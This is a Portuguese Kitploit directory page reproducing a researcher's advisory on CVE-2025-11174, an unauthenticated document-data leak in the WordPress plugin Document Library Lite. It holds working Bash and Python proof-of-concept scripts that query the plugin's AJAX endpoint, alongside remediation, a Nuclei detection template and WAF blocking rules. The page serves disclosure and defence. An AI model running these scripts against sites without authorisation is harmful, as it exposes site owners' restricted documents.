Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Autorização Ausente para Exposição de Informações Sensíveis | CVE-2025-11174 | Kitploit
Ferramentas/GitHubGitHub/snailsploit/cve-2025-11174
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Autorização Ausente para Exposição de Informações Sensíveis | CVE-2025-11174

Ver Repositório
2há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-11174: Divulgação Não Autenticada de Informações no Plugin WordPress Document Library Lite

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Palavras-chave: CVE-2025-11174, Document Library Lite vulnerability, information disclosure, WordPress security, unauthenticated AJAX exploit, WordPress plugin vulnerability, CWE-862, WordPress document plugin security, authorization bypass, WordPress CVE 2025

Sumário

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Análise Técnica
  • Vetor de Ataque
  • Prova de Conceito
  • Guia de Remediação
  • Detecção
  • Métricas CVSS
  • Referências
  • Créditos
  • Contato de Segurança
  • Visão Geral

    Vulnerabilidade de Divulgação de Informações no Plugin WordPress Document Library Lite (CVE-2025-11174) – Falha de segurança que permite acesso não autenticado a dados confidenciais de documentos no plugin de biblioteca de documentos do WordPress.

    Foi descoberta uma vulnerabilidade crítica de bypass de autorização no Plugin WordPress Document Library Lite que permite que atacantes não autenticados acessem informações confidenciais de documentos sem a devida autenticação.

    Descoberto por: Kai Aizen & Avraham Shemesh (SnailSploit)
    Publicado: 1 de novembro de 2025
    Pontuação CVSS: 5.3 (Médio)
    CWE: CWE-862 – Autorização Ausente
    Plugin: Document Library Lite
    Fornecedor: Barn2 Plugins
    Tipo de Ataque: Divulgação de Informações Não Autenticada
    Privilégios Necessários: Nenhum (Ataque Não Autenticado)

    Detalhes da Vulnerabilidade

    Descrição

    O plugin Document Library Lite para WordPress contém uma vulnerabilidade de autorização inadequada em todas as versões até a 1.1.6 inclusive. O plugin expõe uma ação AJAX não autenticada dll_load_posts que retorna uma tabela JSON de dados de documentos sem realizar verificações de nonce ou capacidade.

    Impacto

    Esta vulnerabilidade permite que atacantes não autenticados:

    • Acessem metadados de documentos sem autorização
    • Recuperem listagens de documentos que deveriam ser restritas
    • Visualizem informações de documentos destinadas apenas a usuários autenticados
    • Enumerem documentos armazenados na Document Library

    Nota: A pontuação CVSS de 5.3 (gravidade Média) reflete divulgação limitada de informações. Embora a vulnerabilidade permita acesso não autenticado aos dados de documentos, o impacto é classificado como Baixo para confidencialidade, sem impacto na integridade ou disponibilidade.

    Versões Afetadas

    • Vulnerável: Todas as versões ≤ 1.1.6
    • Corrigido: Versão 1.1.7 e superiores

    Métricas CVSS v3.1

    root@kitploit:~
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    
    MétricaValor
    Vetor de AtaqueRede (AV:N)
    Complexidade do AtaqueBaixa (AC:L)
    Privilégios NecessáriosNenhum (PR:N)
    Interação do UsuárioNenhuma (UI:N)
    EscopoInalterado (S:U)
    ConfidencialidadeBaixa (C:L)
    IntegridadeNenhum (I:N)
    DisponibilidadeNenhum (A:N)

    Detalhamento CVSS v3.1:

    • Vetor de Ataque (AV): Rede – A vulnerabilidade pode ser explorada remotamente através de uma rede
    • Complexidade do Ataque (AC): Baixa – Nenhuma condição especial é necessária para exploração
    • Privilégios Necessários (PR): Nenhum – Nenhuma autenticação ou privilégios são necessários
    • Interação do Usuário (UI): Nenhuma – O exploit funciona sem qualquer interação do usuário
    • Escopo (S): Inalterado – A vulnerabilidade afeta apenas o componente vulnerável
    • Impacto na Confidencialidade (C): Baixo – Divulgação limitada de informações
    • Impacto na Integridade (I): Nenhum – Sem impacto na integridade
    • Impacto na Disponibilidade (A): Nenhum – Sem impacto na disponibilidade

    Análise Técnica

    Causa Raiz da Vulnerabilidade

    A ação AJAX dll_load_posts é registrada sem verificações adequadas de autenticação ou autorização:

    root@kitploit:~
    // Padrão de código vulnerável (simplificado)
    add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
    

    O prefixo wp_ajax_nopriv_ indica que esta ação é acessível a usuários não autenticados, e a função de retorno não implementa:

    • Verificação de nonce
    • Verificações de capacidade
    • Validação de autenticação do usuário

    Vetor de Ataque

    root@kitploit:~
    POST /wp-admin/admin-ajax.php
    action=dll_load_posts
    

    A vulnerabilidade pode ser explorada através do endpoint admin-ajax.php do WordPress sem autenticação.

    Prova de Conceito

    ⚠️ Apenas para Fins Educacionais e de Teste Autorizados

    PoC em Bash

    root@kitploit:~
    #!/bin/bash
    # CVE-2025-11174 PoC
    
    TARGET_URL="$1"
    
    if [ -z "$TARGET_URL" ]; then
        echo "Usage: $0 <target_url>"
        echo "Example: $0 https://example.com"
        exit 1
    fi
    
    echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
    echo "[*] Target: $TARGET_URL"
    echo ""
    
    # Send request to vulnerable AJAX endpoint
    curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      -d "action=dll_load_posts" \
      | python3 -m json.tool
    
    echo ""
    echo "[+] If you see document data above, the site is vulnerable!"
    

    PoC em Python

    root@kitploit:~
    #!/usr/bin/env python3
    """
    CVE-2025-11174 - Document Library Lite Information Disclosure PoC
    For educational and authorized testing purposes only
    """
    
    import requests
    import sys
    import json
    
    def exploit(target_url):
        ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
        
        print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
        print(f"[*] Target: {target_url}")
        print(f"[*] AJAX Endpoint: {ajax_url}\n")
        
        data = {'action': 'dll_load_posts'}
        
        try:
            response = requests.post(ajax_url, data=data, timeout=10)
            
            if response.status_code == 200:
                print("[+] Request successful!\n")
                try:
                    json_data = response.json()
                    print("[+] Retrieved document data:")
                    print(json.dumps(json_data, indent=2))
                    print("\n[!] Site is VULNERABLE to CVE-2025-11174")
                except json.JSONDecodeError:
                    print("[-] No JSON response received")
                    print(f"Response: {response.text[:200]}")
            else:
                print(f"[-] Request failed with status code: {response.status_code}")
                
        except requests.RequestException as e:
            print(f"[-] Error: {e}")
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print(f"Usage: {sys.argv[0]} <target_url>")
            print(f"Example: {sys.argv[0]} https://example.com")
            sys.exit(1)
        
        target = sys.argv[1]
        exploit(target)
    

    Remediação

    Para Administradores de Sites

    Ação Imediata Necessária:

    1. Atualize para a versão 1.1.7 ou superior do Document Library Lite imediatamente
    2. Revise os logs de acesso do seu site em busca de requisições POST suspeitas para admin-ajax.php com action=dll_load_posts
    3. Se não puder atualizar imediatamente, considere desativar temporariamente o plugin

    Instruções de Atualização

    Via Admin do WordPress:

    1. Navegue até Plugins > Plugins Instalados no admin do WordPress
    2. Localize "Document Library Lite"
    3. Clique em Atualizar Agora para atualizar para a versão 1.1.7 ou superior
    4. Verifique se a atualização foi bem-sucedida

    Usando WP-CLI:

    root@kitploit:~
    wp plugin update document-library-lite
    

    Para Desenvolvedores de Plugins

    Garanta que todos os manipuladores AJAX implementem os controles de segurança adequados:

    root@kitploit:~
    // Exemplo de segurança AJAX adequada
    add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');
    
    function dll_load_posts_callback() {
        // Verificar nonce
        if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
            wp_die('Invalid nonce');
        }
        
        // Verificar capacidades
        if (!current_user_can('read')) {
            wp_send_json_error('Insufficient permissions');
            wp_die();
        }
        
        // Seu código seguro aqui
    }
    

    Detecção

    Verificação do Plugin WordPress

    root@kitploit:~
    # Verificar se uma versão vulnerável está instalada
    wp plugin list | grep -i "document-library-lite"
    

    Regras para Scanner de Segurança

    Template Nuclei:

    root@kitploit:~
    id: CVE-2025-11174
    
    info:
      name: Document Library Lite - Unauthenticated Information Disclosure
      author: security-research
      severity: medium
      description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
      reference:
        - https://github.com/[your-repo]/CVE-2025-11174
      tags: cve,cve2025,wordpress,wp-plugin,unauth
    
    requests:
      - method: POST
        path:
          - "{{BaseURL}}/wp-admin/admin-ajax.php"
        
        body: "action=dll_load_posts"
        
        matchers-condition: and
        matchers:
          - type: word
            words:
              - "data"
              - "recordsTotal"
            condition: and
          
          - type: status
            status:
              - 200
    

    Regras para Firewall de Aplicação Web

    Regra ModSecurity:

    root@kitploit:~
    SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
        "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
        log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
        SecRule ARGS:action "@streq dll_load_posts" "t:none"
    

    Regra Nginx/OpenResty:

    root@kitploit:~
    if ($request_uri ~* "admin-ajax\.php") {
        if ($args ~* "action=dll_load_posts") {
            return 403;
        }
    }
    

    Linha do Tempo

    • 1 de novembro de 2025 – Vulnerabilidade divulgada publicamente
    • 1 de novembro de 2025 – Registro CVE publicado
    • Novembro de 2025 – Patch lançado (versão 1.1.7)

    Referências

    • CVE-2025-11174 - CVE.org
    • GitHub Advisory Database
    • Wordfence Intelligence
    • WordPress Plugin Directory

    Créditos

    Pesquisadores:

    • Avraham Shemesh
    • Kai Aizen - SnailSploit

    Processo de Divulgação: Divulgação coordenada

    Aviso Legal

    Esta informação é fornecida apenas para fins de pesquisa em segurança e defesa. Qualquer exploração desta vulnerabilidade para fins maliciosos é ilegal e antiética. Sempre obtenha autorização adequada antes de testar sistemas que você não possui.

    Contato

    Para perguntas ou informações adicionais sobre esta vulnerabilidade:

    • E-mail: [email protected]
    • Site: snailsploit.com
    • Organização: SnailSploit Security Research

    Última atualização: 2 de novembro de 2025


    📚 Documentação & Autor

    O artigo completo, metodologia e pesquisas relacionadas deste projeto estão em:

    https://snailsploit.com/security-research/cves/cve-2025-11174/

    Criado por Kai Aizen — pesquisador independente de segurança ofensiva.

    snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

    Mesmo ataque. Substrato diferente.

    Baixar ferramenta